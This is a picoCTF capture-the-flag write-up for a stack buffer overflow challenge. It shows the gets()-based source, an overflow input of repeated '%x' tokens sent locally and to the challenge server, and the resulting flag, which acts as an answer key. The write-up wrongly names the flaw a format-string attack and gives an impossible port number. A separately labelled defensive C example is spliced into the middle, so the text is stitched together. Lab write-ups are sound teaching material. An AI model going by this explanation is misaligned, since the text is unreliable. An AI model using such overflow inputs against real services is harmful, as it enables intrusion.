Category: Binary Exploitation
Smash the stack
Let's start off simple: can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using: nc saturn.picoctf.net 531821
Download all the things:
wget https://artifacts.picoctf.net/c/525/vuln
wget https://artifacts.picoctf.net/c/525/vuln.c
Let's start by running vuln and seeing what we get. First we need to set the executable bit using chmod:
chmod +x vuln
└─$ ./vuln
Please create 'flag.txt' in this directory with your own debugging flag.
Now create a flag.txt and restart 'vuln':
echo "picoCTF{testflag}" > flag.txt
└─$ ./vuln
Input: test
The program will exit now
We are prompted to input a value, and when doing so the program just seems to exit. So let's look at the source code and see if we can figure out what's going on. Looking at the main function we can see that it uses the 'gets()' function to obtain the user input. This function is vulnerable to a Format String Attack, so we should be able to get the program to output memory values by passing in the '%x' format string.
#define _GNU_SOURCE          /* for setresgid() */
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>

/* Declarations from the rest of vuln.c, which is not shown here; the
   FLAGSIZE_MAX value below is a placeholder, not the challenge's value. */
#define FLAGSIZE_MAX 64                 /* placeholder */
char flag[FLAGSIZE_MAX];
void sigsegv_handler(int sig);          /* defined elsewhere in vuln.c */
void vuln(char *input);                 /* defined elsewhere in vuln.c */

int main(int argc, char **argv){
    FILE *f = fopen("flag.txt","r");
    if (f == NULL) {
        printf("%s %s", "Please create 'flag.txt' in this directory with your",
                        "own debugging flag.\n");
        exit(0);
    }
    fgets(flag,FLAGSIZE_MAX,f);
    signal(SIGSEGV, sigsegv_handler); // Set up signal handler
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    printf("Input: ");
    fflush(stdout);
    char buf1[100];
    gets(buf1);                         // unbounded read into a 100-byte buffer
    vuln(buf1);
    printf("The program will exit now\n");
    return 0;
}
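The main() above copies whatever the user types into the 100-byte buf1 with gets(), which has no way of knowing how large the buffer is. As an added example (not part of the challenge source or this writeup), here is the bounded replacement a defender would use: fgets() with the buffer size, a drain of any excess so it cannot spill into a later read, and an explicit rejection of over-long input. The names read_line_bounded, read_from_string and handle_input are my own, and the sample inputs in the tests are constructed.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

/* Outcome of one bounded line read (names are mine, not the challenge's). */
enum read_status { READ_OK = 0, READ_TRUNCATED = 1, READ_EOF = 2 };

/* Read one line from `in` into `dst` (cap bytes, NUL included), never writing
 * past it. An over-long line is cut at the buffer, the excess is drained so it
 * cannot leak into the next read, and READ_TRUNCATED tells the caller to reject it. */
enum read_status read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) {
        if (cap) dst[0] = '\0';
        return READ_EOF;
    }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';             /* strip the newline, as gets() did */
        return READ_OK;
    }
    /* No newline in dst: line fit exactly, ended at EOF, or was too long. */
    int c = fgetc(in);
    if (c == EOF || c == '\n') return READ_OK;
    while (c != '\n' && c != EOF) c = fgetc(in);   /* drain the overflow */
    return READ_TRUNCATED;
}

/* Feed a constructed string through read_line_bounded into a cap-byte buffer. */
enum read_status read_from_string(const char *text, char *out, size_t cap)
{
    FILE *in = fmemopen((void *)text, strlen(text), "r");
    if (in == NULL) return READ_EOF;
    enum read_status st = read_line_bounded(out, cap, in);
    fclose(in);
    return st;
}

/* Drop-in for the challenge's gets(buf1): same buffer, bounded read. */
int handle_input(FILE *in, char *buf1, size_t cap)
{
    if (read_line_bounded(buf1, cap, in) == READ_TRUNCATED) {
        fprintf(stderr, "input longer than %zu bytes, rejected\n", cap - 1);
        return -1;
    }
    printf("Input: %s\n", buf1);   /* user data as an argument, never as the format */
    return 0;
}
```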
Let's try it out and see what happens:
└─$ ./vuln
Input: %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
picoCTF{test_flag}
And as you can see, passing in all of those %x format strings, the program prints out our test flag locally. Now let's try it on the supplied server.
└─$ nc saturn.picoctf.net 65445
Input: %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
picoCTF{ov3rfl0ws_ar3nt_that_bad_6091cc95}
As you can see we get our flag for the challenge!
picoCTF{ov3rfl0ws_ar3nt_that_bad_6091cc95}